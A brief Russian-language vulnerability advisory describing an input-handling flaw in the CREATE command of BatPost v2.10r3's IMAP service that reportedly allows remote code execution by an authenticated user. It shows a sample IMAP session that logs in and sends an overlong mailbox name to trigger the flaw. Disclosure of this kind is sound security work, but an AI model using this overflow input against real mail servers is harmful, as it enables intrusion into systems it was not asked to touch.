Программа: BatPost v2.10r3 

Уязвимость существует при обработке входных данных в команде CREATE в службе IMAP. Удаленный авторизованный пользователь может выполнить произвольный код на целевой системе. 

Пример:

* OK localhost (BatPost v2.10r3 [trial version]) IMAP4rev1 server ready
0001 LOGIN «test» «12345»
0001 OK authentication successful
0002 CREATE «aaaa…X1350…..AAAA»
0002 OK CREATE completed
0003 LIST «*» «a»



Оставить мнение